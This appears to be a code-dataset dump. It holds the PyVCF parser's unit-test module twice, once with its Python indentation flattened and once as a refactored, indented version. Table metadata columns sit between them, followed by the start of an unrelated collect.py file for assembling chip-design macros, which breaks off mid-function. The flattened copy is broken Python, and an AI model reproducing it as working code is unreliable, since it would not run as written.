suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFreebayesOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamtoolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestWriterDictionaryMeta))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestTabix))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestOpenMethods))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFilter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kg))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kgSites))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGoNL))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamplesSpace))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestMixedFiltering))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRecord))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestCall))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRegression))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestVcfSpecs))
| 34.429796 | 176 | 0.559225 | from __future__ import print_function
import unittest
import doctest
import os
import commands
import cPickle
from StringIO import StringIO
import vcf
from vcf import utils
suite = doctest.DocTestSuite(vcf)
def fh(fname, mode='rt'):
return open(os.path.join(os.path.dirname(__file__), fname), mode)
class TestVcfSpecs(unittest.TestCase):
def test_vcf_4_0(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
assert reader.metadata['fileformat'] == 'VCFv4.0'
# test we can walk the file at least
for r in reader:
if r.POS == 1230237:
assert r.is_monomorphic
else:
assert not r.is_monomorphic
if 'AF' in r.INFO:
self.assertEqual(type(r.INFO['AF']), type([]))
for c in r:
assert c
# issue 19, in the example ref the GQ is length 1
if c.called:
self.assertEqual(type(c.data.GQ), type(1))
if 'HQ' in c.data and c.data.HQ is not None:
self.assertEqual(type(c.data.HQ), type([]))
def test_vcf_4_1(self):
reader = vcf.Reader(fh('example-4.1.vcf'))
self.assertEqual(reader.metadata['fileformat'], 'VCFv4.1')
# contigs were added in vcf4.1
self.assertEqual(reader.contigs['20'].length, 62435964)
# test we can walk the file at least
for r in reader:
for c in r:
assert c
def test_vcf_4_1_sv(self):
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
assert 'SVLEN' in reader.infos
assert 'fileDate' in reader.metadata
assert 'DEL' in reader.alts
# test we can walk the file at least
for r in reader:
print(r)
for a in r.ALT:
print(a)
for c in r:
print(c)
assert c
def test_vcf_4_1_bnd(self):
reader = vcf.Reader(fh('example-4.1-bnd.vcf'))
# test we can walk the file at least
for r in reader:
print(r)
for a in r.ALT:
print(a)
if r.ID == "bnd1":
assert len(r.ALT) == 1
assert r.ALT[0].type == "BND"
assert r.ALT[0].chr == "2"
assert r.ALT[0].pos == 3
assert r.ALT[0].orientation == False
assert r.ALT[0].remoteOrientation == True
assert r.ALT[0].connectingSequence == "T"
if r.ID == "bnd4":
assert len(r.ALT) == 1
assert r.ALT[0].type == "BND"
assert r.ALT[0].chr == "1"
assert r.ALT[0].pos == 2
assert r.ALT[0].orientation == True
assert r.ALT[0].remoteOrientation == False
assert r.ALT[0].connectingSequence == "G"
for c in r:
print(c)
assert c
class TestGatkOutput(unittest.TestCase):
filename = 'gatk.vcf'
samples = ['BLANK', 'NA12878', 'NA12891', 'NA12892',
'NA19238', 'NA19239', 'NA19240']
formats = ['AD', 'DP', 'GQ', 'GT', 'PL']
infos = ['AC', 'AF', 'AN', 'BaseQRankSum', 'DB', 'DP', 'DS',
'Dels', 'FS', 'HRun', 'HaplotypeScore', 'InbreedingCoeff',
'MQ', 'MQ0', 'MQRankSum', 'QD', 'ReadPosRankSum']
n_calls = 37
def setUp(self):
self.reader = vcf.Reader(fh(self.filename))
def testSamples(self):
self.assertEqual(self.reader.samples, self.samples)
def testFormats(self):
self.assertEqual(set(self.reader.formats), set(self.formats))
def testInfos(self):
self.assertEqual(set(self.reader.infos), set(self.infos))
def testCalls(self):
n = 0
for site in self.reader:
n += 1
self.assertEqual(len(site.samples), len(self.samples))
# check sample name lookup
for s in self.samples:
assert site.genotype(s)
# check ordered access
self.assertEqual([x.sample for x in site.samples], self.samples)
self.assertEqual(n, self.n_calls)
class TestFreebayesOutput(TestGatkOutput):
filename = 'freebayes.vcf'
formats = ['AO', 'DP', 'GL', 'GLE', 'GQ', 'GT', 'QA', 'QR', 'RO']
infos = ['AB', 'ABP', 'AC', 'AF', 'AN', 'AO', 'BVAR', 'CIGAR',
'DB', 'DP', 'DPRA', 'EPP', 'EPPR', 'HWE', 'LEN', 'MEANALT',
'NUMALT', 'RPP', 'MQMR', 'ODDS', 'MQM', 'PAIREDR', 'PAIRED',
'SAP', 'XRM', 'RO', 'REPEAT', 'XRI', 'XAS', 'XAI', 'SRP',
'XAM', 'XRS', 'RPPR', 'NS', 'RUN', 'CpG', 'TYPE']
n_calls = 104
def testParse(self):
reader = vcf.Reader(fh('freebayes.vcf'))
print(reader.samples)
self.assertEqual(len(reader.samples), 7)
n = 0
for r in reader:
n+=1
for x in r:
assert x
assert n == self.n_calls
class TestSamtoolsOutput(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('samtools.vcf'))
self.assertEqual(len(reader.samples), 1)
self.assertEqual(sum(1 for _ in reader), 11)
class TestBcfToolsOutput(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('bcftools.vcf'))
self.assertEqual(len(reader.samples), 1)
for r in reader:
for s in r.samples:
s.phased
class Test1kg(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('1kg.vcf.gz', 'rb'))
assert 'FORMAT' in reader._column_headers
self.assertEqual(len(reader.samples), 629)
for _ in reader:
pass
def test_issue_49(self):
"""docstring for test_issue_49"""
reader = vcf.Reader(fh('issue_49.vcf', 'r'))
self.assertEqual(len(reader.samples), 0)
for _ in reader:
pass
class Test1kgSites(unittest.TestCase):
def test_reader(self):
"""The samples attribute should be the empty list."""
reader = vcf.Reader(fh('1kg.sites.vcf', 'r'))
assert 'FORMAT' not in reader._column_headers
self.assertEqual(reader.samples, [])
for record in reader:
self.assertEqual(record.samples, [])
def test_writer(self):
"""FORMAT should not be written if not present in the template and no
extra tab character should be printed if there are no FORMAT fields."""
reader = vcf.Reader(fh('1kg.sites.vcf', 'r'))
out = StringIO()
writer = vcf.Writer(out, reader, lineterminator='\n')
for record in reader:
writer.write_record(record)
out.seek(0)
out_str = out.getvalue()
for line in out_str.split('\n'):
if line.startswith('##'):
continue
if line.startswith('#CHROM'):
assert 'FORMAT' not in line
assert not line.endswith('\t')
class TestGoNL(unittest.TestCase):
def testParse(self):
reader = vcf.Reader(fh('gonl.chr20.release4.gtc.vcf'))
for _ in reader:
pass
def test_contig_line(self):
reader = vcf.Reader(fh('gonl.chr20.release4.gtc.vcf'))
self.assertEqual(reader.contigs['1'].length, 249250621)
class TestGatkOutputWriter(unittest.TestCase):
def testWrite(self):
reader = vcf.Reader(fh('gatk.vcf'))
out = StringIO()
writer = vcf.Writer(out, reader)
records = list(reader)
for record in records:
writer.write_record(record)
out.seek(0)
out_str = out.getvalue()
for line in out_str.split("\n"):
if line.startswith("##contig"):
assert line.startswith('##contig=<'), "Found dictionary in contig line: {0}".format(line)
print (out_str)
reader2 = vcf.Reader(out)
self.assertEquals(reader.samples, reader2.samples)
self.assertEquals(reader.formats, reader2.formats)
self.assertEquals(reader.infos, reader2.infos)
for l, r in zip(records, reader2):
self.assertEquals(l.samples, r.samples)
# test for call data equality, since equality on the sample calls
# may not always mean their data are all equal
for l_call, r_call in zip(l.samples, r.samples):
self.assertEqual(l_call.data, r_call.data)
class TestBcfToolsOutputWriter(unittest.TestCase):
def testWrite(self):
reader = vcf.Reader(fh('bcftools.vcf'))
out = StringIO()
writer = vcf.Writer(out, reader)
records = list(reader)
for record in records:
writer.write_record(record)
out.seek(0)
print (out.getvalue())
reader2 = vcf.Reader(out)
self.assertEquals(reader.samples, reader2.samples)
self.assertEquals(reader.formats, reader2.formats)
self.assertEquals(reader.infos, reader2.infos)
for l, r in zip(records, reader2):
self.assertEquals(l.samples, r.samples)
# test for call data equality, since equality on the sample calls
# may not always mean their data are all equal
for l_call, r_call in zip(l.samples, r.samples):
self.assertEqual(l_call.data, r_call.data)
class TestWriterDictionaryMeta(unittest.TestCase):
def testWrite(self):
reader = vcf.Reader(fh('example-4.1-bnd.vcf'))
out = StringIO()
writer = vcf.Writer(out, reader)
records = list(reader)
for record in records:
writer.write_record(record)
out.seek(0)
out_str = out.getvalue()
for line in out_str.split("\n"):
if line.startswith("##PEDIGREE"):
self.assertEquals(line, '##PEDIGREE=<Derived="Tumor",Original="Germline">')
if line.startswith("##SAMPLE"):
assert line.startswith('##SAMPLE=<'), "Found dictionary in meta line: {0}".format(line)
class TestSamplesSpace(unittest.TestCase):
filename = 'samples-space.vcf'
samples = ['NA 00001', 'NA 00002', 'NA 00003']
def test_samples(self):
self.reader = vcf.Reader(fh(self.filename), strict_whitespace=True)
self.assertEqual(self.reader.samples, self.samples)
class TestMixedFiltering(unittest.TestCase):
filename = 'mixed-filtering.vcf'
def test_mixed_filtering(self):
"""
Test mix of FILTER values (pass, filtered, no filtering).
"""
reader = vcf.Reader(fh(self.filename))
self.assertEqual(next(reader).FILTER, [])
self.assertEqual(next(reader).FILTER, ['q10'])
self.assertEqual(next(reader).FILTER, [])
self.assertEqual(next(reader).FILTER, None)
self.assertEqual(next(reader).FILTER, ['q10', 'q50'])
class TestRecord(unittest.TestCase):
    """Checks for the derived attributes of a parsed VCF record.

    Most tests compare one record attribute against a table of expected
    values keyed by the record's POS (see :meth:`_assert_attr_by_pos`).
    This replaces the old repetitive ``if POS == ...`` chains and also
    fixes ``test_is_snp``, which previously re-used an exhausted reader so
    its assertions never actually ran.
    """

    def _assert_attr_by_pos(self, filename, attr, expected):
        """Open *filename* and assert ``getattr(record, attr)`` equals
        ``expected[record.POS]`` for every position listed in *expected*.

        Also asserts that every expected position was seen, so a missing
        fixture record (or an exhausted reader) fails loudly instead of
        silently checking nothing.
        """
        reader = vcf.Reader(fh(filename))
        checked = 0
        for record in reader:
            if record.POS in expected:
                self.assertEqual(expected[record.POS], getattr(record, attr))
                checked += 1
        self.assertEqual(len(expected), checked)

    def test_num_calls(self):
        # The four genotype categories must account for every sample call.
        reader = vcf.Reader(fh('example-4.0.vcf'))
        for var in reader:
            num_calls = (var.num_hom_ref + var.num_hom_alt +
                         var.num_het + var.num_unknown)
            self.assertEqual(len(var.samples), num_calls)

    def test_call_rate(self):
        self._assert_attr_by_pos('example-4.0.vcf', 'call_rate', {
            14370: 3.0 / 3.0,
            17330: 3.0 / 3.0,
            1110696: 3.0 / 3.0,
            1230237: 3.0 / 3.0,
            1234567: 2.0 / 3.0,
        })

    def test_aaf(self):
        # aaf is None where the alternate allele frequency is undefined.
        self._assert_attr_by_pos('example-4.0.vcf', 'aaf', {
            14370: 3.0 / 6.0,
            17330: 1.0 / 6.0,
            1110696: None,
            1230237: 0.0 / 6.0,
            1234567: None,
        })

    def test_pi(self):
        # Nucleotide diversity; None where it cannot be computed.
        self._assert_attr_by_pos('example-4.0.vcf', 'nucl_diversity', {
            14370: 6.0 / 10.0,
            17330: 1.0 / 3.0,
            1110696: None,
            1230237: 0.0 / 6.0,
            1234567: None,
        })

    def test_is_snp(self):
        # Smoke-test record/call reprs and call truthiness first.
        reader = vcf.Reader(fh('example-4.0.vcf'))
        for r in reader:
            print(r)
            for c in r:
                print(c)
                assert c
        # NOTE: the original test reused the (now exhausted) reader here,
        # so these assertions never executed; the helper opens a fresh one.
        self._assert_attr_by_pos('example-4.0.vcf', 'is_snp', {
            14370: True, 17330: True, 1110696: True,
            1230237: False, 1234567: False,
        })

    def test_is_indel(self):
        self._assert_attr_by_pos('example-4.0.vcf', 'is_indel', {
            14370: False, 17330: False, 1110696: False,
            1230237: True, 1234567: True,
        })

    def test_is_transition(self):
        self._assert_attr_by_pos('example-4.0.vcf', 'is_transition', {
            14370: True, 17330: False, 1110696: False,
            1230237: False, 1234567: False,
        })

    def test_is_deletion(self):
        self._assert_attr_by_pos('example-4.0.vcf', 'is_deletion', {
            14370: False, 17330: False, 1110696: False,
            1230237: True, 1234567: False,
        })

    def test_var_type(self):
        self._assert_attr_by_pos('example-4.0.vcf', 'var_type', {
            14370: "snp", 17330: "snp", 1110696: "snp",
            1230237: "indel", 1234567: "indel",
        })
        # SV tests
        self._assert_attr_by_pos('example-4.1-sv.vcf', 'var_type', {
            2827693: "sv", 321682: "sv", 14477084: "sv",
            9425916: "sv", 12665100: "sv", 18665128: "sv",
        })

    def test_var_subtype(self):
        self._assert_attr_by_pos('example-4.0.vcf', 'var_subtype', {
            14370: "ts", 17330: "tv", 1110696: "unknown",
            1230237: "del", 1234567: "unknown",
        })
        # SV tests
        self._assert_attr_by_pos('example-4.1-sv.vcf', 'var_subtype', {
            2827693: "DEL", 321682: "DEL", 14477084: "DEL:ME:ALU",
            9425916: "INS:ME:L1", 12665100: "DUP", 18665128: "DUP:TANDEM",
        })

    def test_is_sv(self):
        self._assert_attr_by_pos('example-4.1-sv.vcf', 'is_sv', {
            2827693: True, 321682: True, 14477084: True,
            9425916: True, 12665100: True, 18665128: True,
        })
        self._assert_attr_by_pos('example-4.0.vcf', 'is_sv', {
            14370: False, 17330: False, 1110696: False,
            1230237: False, 1234567: False,
        })

    def test_is_sv_precise(self):
        self._assert_attr_by_pos('example-4.1-sv.vcf', 'is_sv_precise', {
            2827693: True, 321682: False, 14477084: False,
            9425916: False, 12665100: False, 18665128: False,
        })
        self._assert_attr_by_pos('example-4.0.vcf', 'is_sv_precise', {
            14370: False, 17330: False, 1110696: False,
            1230237: False, 1234567: False,
        })

    def test_sv_end(self):
        self._assert_attr_by_pos('example-4.1-sv.vcf', 'sv_end', {
            2827693: 2827680, 321682: 321887, 14477084: 14477381,
            9425916: 9425916, 12665100: 12686200, 18665128: 18665204,
        })
        # Non-SV records have no END.
        self._assert_attr_by_pos('example-4.0.vcf', 'sv_end', {
            14370: None, 17330: None, 1110696: None,
            1230237: None, 1234567: None,
        })

    def test_qual(self):
        # QUAL must round-trip with the right Python type as well as value:
        # integral stays int, fractional/exponent stays float, '.' is None.
        expected = {14370: 29, 17330: 3.0, 1110696: 1e+03,
                    1230237: 47, 1234567: None}
        reader = vcf.Reader(fh('example-4.0.vcf'))
        for var in reader:
            self.assertEqual(expected[var.POS], var.QUAL)
            self.assertEqual(type(expected[var.POS]), type(var.QUAL))

    def test_info_multiple_values(self):
        reader = vcf.Reader(fh('example-4.1-info-multiple-values.vcf'))
        var = next(reader)  # was reader.next(), which is Python 2 only
        # check Float type INFO field with multiple values
        expected = [19.3, 47.4, 14.0]
        self.assertEqual(expected, var.INFO['RepeatCopies'])
        # check Integer type INFO field with multiple values
        expected = [42, 14, 56]
        self.assertEqual(expected, var.INFO['RepeatSize'])
        # check String type INFO field with multiple values
        expected = ['TCTTATCTTCTTACTTTTCATTCCTTACTCTTACTTACTTAC',
                    'TTACTCTTACTTAC',
                    'TTACTCTTACTTACTTACTCTTACTTACTTACTCTTACTTACTTACTCTTATCTTC']
        self.assertEqual(expected, var.INFO['RepeatConsensus'])

    def test_pickle(self):
        # Records must survive a pickle round-trip unchanged.
        reader = vcf.Reader(fh('example-4.0.vcf'))
        for var in reader:
            self.assertEqual(cPickle.loads(cPickle.dumps(var)), var)
class TestCall(unittest.TestCase):
    """Per-sample call attributes of parsed records."""

    # Expected per-sample values keyed by record POS, in sample order.
    PHASED = {
        14370: [True, True, False],
        17330: [True, True, False],
        1110696: [True, True, False],
        1230237: [True, True, False],
        1234567: [False, False, False],
    }
    GT_BASES = {
        14370: ['G|G', 'A|G', 'A/A'],
        17330: ['T|T', 'T|A', 'T/T'],
        1110696: ['G|T', 'T|G', 'T/T'],
        1230237: ['T|T', 'T|T', 'T/T'],
        1234567: [None, 'GTCT/GTACT', 'G/G'],
    }
    GT_TYPES = {
        14370: [0, 1, 2],
        17330: [0, 1, 0],
        1110696: [1, 1, 2],
        1230237: [0, 0, 0],
        1234567: [None, 1, 2],
    }

    def _assert_sample_attr(self, attr, expected):
        """Compare ``attr`` across each record's samples with *expected*."""
        reader = vcf.Reader(fh('example-4.0.vcf'))
        for var in reader:
            if var.POS in expected:
                self.assertEqual(expected[var.POS],
                                 [getattr(s, attr) for s in var.samples])

    def test_phased(self):
        self._assert_sample_attr('phased', self.PHASED)

    def test_gt_bases(self):
        self._assert_sample_attr('gt_bases', self.GT_BASES)

    def test_gt_types(self):
        reader = vcf.Reader(fh('example-4.0.vcf'))
        for var in reader:
            for s in var:
                print(s.data)
            if var.POS in self.GT_TYPES:
                self.assertEqual(self.GT_TYPES[var.POS],
                                 [s.gt_type for s in var.samples])
class TestTabix(unittest.TestCase):
    """Random access into a bgzipped VCF through a tabix index (needs pysam)."""

    def setUp(self):
        self.reader = vcf.Reader(fh('tb.vcf.gz', 'rb'))
        # NOTE: this flag used to be stored as ``self.run``, which shadowed
        # unittest.TestCase.run(); renamed to avoid clobbering the method.
        self.have_pysam = vcf.parser.pysam is not None

    def testFetchRange(self):
        if not self.have_pysam:
            return
        lines = list(self.reader.fetch('20', 14370, 14370))
        self.assertEqual(len(lines), 1)
        self.assertEqual(lines[0].POS, 14370)

        lines = list(self.reader.fetch('20', 14370, 17330))
        self.assertEqual(len(lines), 2)
        self.assertEqual(lines[0].POS, 14370)
        self.assertEqual(lines[1].POS, 17330)

        lines = list(self.reader.fetch('20', 1110695, 1234567))
        self.assertEqual(len(lines), 3)

    def testFetchSite(self):
        if not self.have_pysam:
            return
        # Single-position fetch returns the record, or None if absent.
        site = self.reader.fetch('20', 14370)
        self.assertEqual(site.POS, 14370)

        site = self.reader.fetch('20', 14369)
        self.assertIsNone(site)
class TestOpenMethods(unittest.TestCase):
    """A Reader can be built from a handle or a filename, plain or gzipped —
    all four routes must expose the same sample list."""

    samples = 'NA00001 NA00002 NA00003'.split()

    def fp(self, fname):
        """Absolute path of a fixture living next to this test module."""
        return os.path.join(os.path.dirname(__file__), fname)

    def testOpenFilehandle(self):
        reader = vcf.Reader(fh('example-4.0.vcf'))
        self.assertEqual(self.samples, reader.samples)
        self.assertEqual('example-4.0.vcf', os.path.split(reader.filename)[1])

    def testOpenFilename(self):
        reader = vcf.Reader(filename=self.fp('example-4.0.vcf'))
        self.assertEqual(self.samples, reader.samples)

    def testOpenFilehandleGzipped(self):
        reader = vcf.Reader(fh('tb.vcf.gz', 'rb'))
        self.assertEqual(self.samples, reader.samples)

    def testOpenFilenameGzipped(self):
        reader = vcf.Reader(filename=self.fp('tb.vcf.gz'))
        self.assertEqual(self.samples, reader.samples)
class TestFilter(unittest.TestCase):
    """End-to-end runs of scripts/vcf_filter.py through a subshell.

    Both tests were previously disabled with a bare ``return`` at the top,
    which made them report as (false) passes; they are now explicitly
    skipped so the runner's output is honest.
    """

    @unittest.skip("FIXME: broken with distribute")
    def testApplyFilter(self):
        s, out = commands.getstatusoutput('python scripts/vcf_filter.py --site-quality 30 test/example-4.0.vcf sq')
        #print(out)
        assert s == 0
        buf = StringIO()
        buf.write(out)
        buf.seek(0)
        print(buf.getvalue())
        reader = vcf.Reader(buf)
        # check filter got into output file
        assert 'sq30' in reader.filters
        print(reader.filters)
        # check sites were filtered
        n = 0
        for r in reader:
            if r.QUAL < 30:
                assert 'sq30' in r.FILTER
                n += 1
            else:
                assert 'sq30' not in r.FILTER
        assert n == 2

    @unittest.skip("FIXME: broken with distribute")
    def testApplyMultipleFilters(self):
        s, out = commands.getstatusoutput('python scripts/vcf_filter.py --site-quality 30 '
                                          '--genotype-quality 50 test/example-4.0.vcf sq mgq')
        assert s == 0
        #print(out)
        buf = StringIO()
        buf.write(out)
        buf.seek(0)
        reader = vcf.Reader(buf)
        print(reader.filters)
        assert 'mgq50' in reader.filters
        assert 'sq30' in reader.filters
class TestRegression(unittest.TestCase):
    """Regression tests for previously reported parser bugs."""

    def test_issue_16(self):
        # A missing QUAL ('.') must parse as None, not raise (GitHub #16).
        reader = vcf.Reader(fh('issue-16.vcf'))
        record = next(reader)  # was reader.next(): Python 2 only
        self.assertIsNone(record.QUAL)

    def test_null_mono(self):
        # null qualities were written as blank, causing subsequent parse to fail
        print(os.path.abspath(os.path.join(os.path.dirname(__file__), 'null_genotype_mono.vcf')))
        reader = vcf.Reader(fh('null_genotype_mono.vcf'))
        self.assertTrue(reader.samples)
        out = StringIO()
        writer = vcf.Writer(out, reader)
        for record in reader:
            writer.write_record(record)
        # Re-parse what we just wrote; it must round-trip cleanly.
        out.seek(0)
        print(out.getvalue())
        reparsed = vcf.Reader(out)
        record = next(reparsed)  # was .next(): Python 2 only
        self.assertTrue(record.samples)
class TestUtils(unittest.TestCase):
    """Tests for the helpers in vcf.utils."""

    def test_walk(self):
        # easy case: three readers over the same file see identical sites
        readers = [vcf.Reader(fh('example-4.0.vcf')) for _ in range(3)]
        sites = 0
        for recs in utils.walk_together(*readers):
            self.assertEqual(len(recs), 3)
            self.assertEqual(recs[0], recs[1])
            self.assertEqual(recs[1], recs[2])
            sites += 1
        self.assertEqual(sites, 5)

        # artificial case: 2 from the left, 2 from the right, 2 together,
        # 1 from the right, 1 from the left
        expected = 'llrrttrl'
        left = vcf.Reader(fh('walk_left.vcf'))
        right = vcf.Reader(fh('example-4.0.vcf'))
        for ex, recs in zip(expected, utils.walk_together(left, right)):
            if ex == 'l':
                self.assertIsNotNone(recs[0])
                self.assertIsNone(recs[1])
            elif ex == 'r':
                self.assertIsNotNone(recs[1])
                self.assertIsNone(recs[0])
            elif ex == 't':
                self.assertIsNotNone(recs[0])
                self.assertIsNotNone(recs[1])

    def test_trim(self):
        cases = [
            ('TAA GAA', 'T G'),
            ('TA TA', 'T T'),
            ('AGTTTTTA AGTTTA', 'AGTT AG'),
            ('TATATATA TATATA', 'TAT T'),
            ('TATATA TATATATA', 'T TAT'),
            ('ACCCCCCC ACCCCCCCCCC ACCCCCCCCC ACCCCCCCCCCC', 'A ACCC ACC ACCCC'),
        ]
        for sequences, expected in cases:
            self.assertEqual(utils.trim_common_suffix(*sequences.split()),
                             expected.split())
class TestGATKMeta(unittest.TestCase):
    """GATK 2.6-style structured ##GATKCommandLine metadata parses cleanly."""

    def test_meta(self):
        # expect no exceptions raised while parsing
        reader = vcf.Reader(fh('gatk_26_meta.vcf'))
        self.assertIn('GATKCommandLine', reader.metadata)
        command_lines = reader.metadata['GATKCommandLine']
        self.assertEqual(command_lines[0]['CommandLineOptions'],
                         '"analysis_type=LeftAlignAndTrimVariants"')
        self.assertEqual(command_lines[1]['CommandLineOptions'],
                         '"analysis_type=VariantAnnotator annotation=[HomopolymerRun, '
                         'VariantType, TandemRepeatAnnotator]"')
# Register every test case with the module-level suite, preserving order.
for _test_case in (
        TestGatkOutput,
        TestFreebayesOutput,
        TestSamtoolsOutput,
        TestBcfToolsOutput,
        TestGatkOutputWriter,
        TestBcfToolsOutputWriter,
        TestWriterDictionaryMeta,
        TestTabix,
        TestOpenMethods,
        TestFilter,
        Test1kg,
        Test1kgSites,
        TestGoNL,
        TestSamplesSpace,
        TestMixedFiltering,
        TestRecord,
        TestCall,
        TestRegression,
        TestVcfSpecs,
):
    suite.addTests(unittest.TestLoader().loadTestsFromTestCase(_test_case))
| 25,397 | 3,446 | 1,585 |
2b23c694cce3e26db30642f22c91aac8af8436c3 | 9,940 | py | Python | collect.py | urish/multi_project_tools | b2b8a2988b9647626955bfbb78993b57fcff3f56 | [
"Apache-2.0"
] | 20 | 2021-03-03T11:04:43.000Z | 2022-03-17T00:17:07.000Z | collect.py | urish/multi_project_tools | b2b8a2988b9647626955bfbb78993b57fcff3f56 | [
"Apache-2.0"
] | 32 | 2021-05-01T21:01:14.000Z | 2022-03-17T18:13:10.000Z | collect.py | urish/multi_project_tools | b2b8a2988b9647626955bfbb78993b57fcff3f56 | [
"Apache-2.0"
] | 16 | 2021-03-07T15:39:40.000Z | 2022-03-21T23:21:56.000Z | from utils import *
import subprocess
import copy
from project import Project
from codegen.caravel_codegen import generate_openlane_files
from codegen.allocator import allocate_macros
REQUIRED_KEYS_GROUP = ["projects", "caravel", "lvs"]
class Collection(object):
    """Drives group-level outputs for the set of combined projects.

    * generate an index.md with a section for each project
      - title, author, description, link, picture
    * could also create the info.yaml file for efabless
    * tile all images for final image
    """
| 43.406114 | 123 | 0.582394 | from utils import *
import subprocess
import copy
from project import Project
from codegen.caravel_codegen import generate_openlane_files
from codegen.allocator import allocate_macros
REQUIRED_KEYS_GROUP = ["projects", "caravel", "lvs"]
class Collection(object):
    """Loads every project listed in the group config and drives the
    multi-project flow: per-project tests, GDS/LEF collection, OpenLane
    wrapper generation, image annotation and documentation.
    """

    def __init__(self, args):
        # args: parsed CLI namespace; args.config names the group YAML file.
        self.args = args
        self.config = parse_config(args.config, REQUIRED_KEYS_GROUP)
        self.projects = []
        # Hard limit of 16 project slots in the user area.
        if not (0 < len(self.config['projects']) <= 16):
            logging.error("bad number of projects - must be > 0 and <= 16")
            exit(1)
        # build the list of projects
        for project_info in self.config['projects'].values():
            repo = project_info["repo"]
            commit = project_info["commit"]
            required_interfaces = list(self.config['interfaces']['required'].keys())
            project = Project(args, repo, commit, required_interfaces, self.config)
            # if --project is given, skip others
            if self.args.project is not None:
                if self.args.project != project.id:
                    continue
            # start from a given project if --from is given
            if self.args.test_from is not None:
                if project.id < self.args.test_from:
                    continue
            # append
            self.projects.append(project)
        # fill space with duplicated projects
        if args.fill and args.fill > len(self.projects):
            num_real_projects = len(self.projects)
            # make the copies (cycling through the real projects), giving
            # each duplicate a fresh id and testbench instance name
            for i in range(len(self.projects), args.fill):
                dup_project = copy.deepcopy(self.projects[i % num_real_projects])
                dup_project.id = i
                dup_project.config['caravel_test']['instance_name'] += str(dup_project.id)
                self.projects.append(dup_project)
        # assert ids are unique
        ids = [project.id for project in self.projects]
        if len(ids) != len(set(ids)):
            logging.error("not all project ids are unique: %s" % ids)
            exit(1)
        self.macro_allocation = {}
        # User-area dimensions in µm, from the group configuration.
        self.width = self.config['configuration']['user_area_width']
        self.height = self.config['configuration']['user_area_height']
        # Required interfaces first; optional definitions may extend them.
        self.interface_definitions = {
            **self.config['interfaces']['required'],
            **self.config['interfaces']['optional']
        }

    def run_tests(self):
        """Run each project's test suite in turn."""
        for project in self.projects:
            project.run_tests()

    def copy_gds(self):
        """Copy each project's GDS/LEF (and gate-level netlist) into the
        user_project_wrapper macro directories inside the Caravel tree."""
        # NOTE(review): macros_dir points at the 'lef' subdirectory, same as
        # lef_dir below — looks like it should be the parent 'macros' dir;
        # confirm before changing.
        macros_dir = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macros', 'lef')
        lef_dir = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macros', 'lef')
        gds_dir = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macros', 'gds')
        # macros directory might not exist
        os.makedirs(macros_dir, exist_ok=True)
        try_mkdir(lef_dir, self.args.force_delete)
        try_mkdir(gds_dir, self.args.force_delete)
        for project in self.projects:
            src = os.path.join(project.directory, project.gds_filename)
            dst = os.path.join(gds_dir, os.path.basename(project.gds_filename))
            logging.info("copying %s to %s" % (src, dst))
            shutil.copyfile(src, dst)
            src = os.path.join(project.directory, project.lef_filename)
            dst = os.path.join(lef_dir, os.path.basename(project.lef_filename))
            logging.info("copying %s to %s" % (src, dst))
            shutil.copyfile(src, dst)
            # gl
            project.copy_gl()

    def annotate_image(self):
        """Render the final GDS to a PNG via klayout and overlay each
        macro's author, title and bounding box."""
        final_gds_file = os.path.join(self.config['caravel']['root'], 'gds', 'user_project_wrapper.gds.gz')
        # dump a 2000x2000 image with klayout to pics/multi_macro.png, check the dump_pic.rb file
        cmd = "klayout -l caravel.lyp %s -r dump_pic.rb" % final_gds_file
        logging.info(cmd)
        os.system(cmd)
        image_file = os.path.join('pics', 'multi_macro.png')
        # PIL imported lazily so the rest of the tool works without it.
        from PIL import Image, ImageFont, ImageDraw
        font_author = ImageFont.truetype("/usr/share/fonts/dejavu/DejaVuSans.ttf", 27)
        font_title = ImageFont.truetype("/usr/share/fonts/dejavu/DejaVuSans.ttf", 22)
        img = Image.open(image_file)
        draw = ImageDraw.Draw(img)
        # Scale factors for converting µm coordinates to image pixels.
        px_per_um = self.config['docs']['px_per_um']
        macro_border = self.config['docs']['macro_border']
        user_width = self.width * px_per_um
        user_height = self.height * px_per_um
        # Centre the user area inside the 2000x2000 render.
        x_offset = (2000 - user_width) / 2
        y_offset = (2000 - user_height) / 2
        allocation = self.allocate_macros()
        logging.info("annotating image")
        for project in self.projects:
            alloc = allocation[project.id]
            logging.info(project)
            x = x_offset + alloc[0] * px_per_um - macro_border
            y = 2000 - (y_offset + alloc[1] * px_per_um - macro_border) # flip, gds is bottom left 0,0, png is top left 0,0
            # takes a while
            macro_w, macro_h = project.get_gds_size()
            macro_w = macro_w * px_per_um + 2*macro_border
            macro_h = macro_h * px_per_um + 2*macro_border
            # Labels above the macro, then the four edges of its outline.
            draw.text((x,y-macro_h-70), project.author, (0,0,0), font=font_author)
            draw.text((x,y-macro_h-40), project.title, (0,0,0), font=font_title)
            draw.line((x, y , x + macro_w, y ), fill=(0,0,0), width=2)
            draw.line((x + macro_w, y , x + macro_w, y - macro_h), fill=(0,0,0), width=2)
